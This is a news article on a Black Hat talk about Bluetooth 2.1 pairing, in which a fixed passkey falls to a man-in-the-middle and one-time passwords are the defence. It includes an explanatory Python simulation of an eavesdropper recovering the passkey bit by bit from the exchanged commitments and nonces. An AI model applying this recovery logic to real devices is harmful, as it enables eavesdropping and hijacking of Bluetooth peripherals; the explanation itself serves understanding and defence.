It's possible to use Bluetooth 2.1 securely, said Andrew Lindell, chief cryptographer for Aladdin Knowledge Systems Ltd., but the odds are stacked against it.
"Good protocol should be hard to get wrong and easy to get right," Lindell said Wednesday at the Black Hat briefings. "Even the best protocols can be badly implemented; in Bluetooth it is the opposite. Unless you really know what you are doing, it's easy to get wrong."
The problem is that the protocol is wide open if a fixed password is used, but secure if a one-time password (OTP) is employed, because a password that changes with every pairing is useless to an attacker who recovers it. The framers of version 2.1 intended it to use OTPs, but didn't require their use anywhere in the 1,400-page protocol document.
Lindell said that in Bluetooth 2.1, a fixed password can be stolen in less than a second using a man-in-the-middle attack, regardless of the length of the password. In 2.0, a long password could thwart the attacker.
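Here, as an added example that is not from Lindell's talk or from the article, is a small Python simulation of why a fixed passkey leaks under 2.1's Passkey Entry pairing. It models the specification's commitment function f1 (HMAC-SHA-256 keyed with the 128-bit nonce over U || V || Z, truncated to 128 bits) and uses random byte strings as stand-ins for the P-192 public keys, which the real protocol exchanges in the clear; the function names and the sample passkey 123456 are this example's own. Each of the 20 passkey bits is committed to and then opened with a fresh nonce, and because public keys, commitments and nonces all travel unencrypted, an observer can test both candidate bits against each commitment and recover the whole passkey in one pass, however long it is.

```python
import hashlib
import hmac
import secrets

PASSKEY_BITS = 20  # a six-digit decimal passkey fits in 20 bits


def f1(u: bytes, v: bytes, x: bytes, z: int) -> bytes:
    """Commitment function modelled on SSP's f1: HMAC-SHA-256 keyed with the
    128-bit nonce x over U || V || Z, keeping the 128 most significant bits."""
    return hmac.new(x, u + v + bytes([z]), hashlib.sha256).digest()[:16]


def passkey_bits(passkey: int) -> list:
    """Passkey as a list of bits, least significant bit first."""
    return [(passkey >> i) & 1 for i in range(PASSKEY_BITS)]


def run_passkey_entry(passkey: int, pk_a: bytes, pk_b: bytes) -> list:
    """Two honest devices, A and B, share the same passkey. For every bit both
    send a commitment, then reveal the nonce behind it, and each side checks
    the other's commitment against its own copy of the bit. Returns what an
    eavesdropper sees per round: (commit_a, commit_b, nonce_a, nonce_b)."""
    transcript = []
    for bit in passkey_bits(passkey):
        ra = rb = 0x80 | bit  # Z = 0x80 with the passkey bit in the low position
        na, nb = secrets.token_bytes(16), secrets.token_bytes(16)
        ca = f1(pk_a, pk_b, na, ra)
        cb = f1(pk_b, pk_a, nb, rb)
        # Honest verification: B recomputes A's commitment using B's own bit
        assert ca == f1(pk_a, pk_b, na, rb), "A's commitment did not verify"
        assert cb == f1(pk_b, pk_a, nb, ra), "B's commitment did not verify"
        transcript.append((ca, cb, na, nb))
    return transcript


def recover_passkey(pk_a: bytes, pk_b: bytes, transcript: list) -> int:
    """Eavesdropper: with the public keys, commitments and nonces all sent in
    the clear, each round's commitment can be checked against both candidate
    bit values; exactly one matches, so the passkey falls out bit by bit."""
    passkey = 0
    for i, (ca, _cb, na, _nb) in enumerate(transcript):
        matches = [b for b in (0, 1) if f1(pk_a, pk_b, na, 0x80 | b) == ca]
        assert len(matches) == 1, "commitment matched both candidate bits"
        passkey |= matches[0] << i
    return passkey


def demo(passkey: int = 123456) -> int:
    """Pair with the given passkey and return what the eavesdropper recovers.
    The public keys are constructed random stand-ins, not real ECDH keys."""
    pk_a, pk_b = secrets.token_bytes(24), secrets.token_bytes(24)
    transcript = run_passkey_entry(passkey, pk_a, pk_b)
    return recover_passkey(pk_a, pk_b, transcript)


if __name__ == "__main__":
    print("recovered passkey:", demo())
```

Run as a script it prints the recovered passkey. The observer never touches the Diffie-Hellman key and never needs to guess: each commitment is a yes/no oracle for one bit, so the work is 20 HMAC comparisons rather than a search over the passkey space. If the passkey is fixed, the recovered value lets the attacker pair with either device later; if it is a one-time value, it expires with the session, which is the OTP defence the article describes.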
An attacker doesn't need the good fortune of being nearby when a user happens to be pairing two devices. Bluetooth devices can be "tricked" into forcing a re-pairing. An alert user might think this is odd, but, Lindell said, most people are used to odd or buggy behavior in their technology, and will simply shrug and re-pair.
Lindell described a second attack, in which an attacker can easily obtain the password of a lost or stolen Bluetooth device.
Although Bluetooth version 2.1 was released more than a year ago, there are almost no implementations. Even manufacturers who are aware of the undocumented OTP requirement face barriers to implementing it.
Hands-free car kits and Bluetooth mice, for example, have no user interface through which a one-time password could be entered. Even where a device has one, manufacturers are likely to be reluctant to inconvenience customers by requiring OTPs.
The results could be a Bluetooth keyboard turned into a keylogger, or a Bluetooth car headset turned into a listening device, a form of the attack known as a "car whisperer."
"Or," joked Lindell, "An attacker could even talk to people over the earpiece and scare them."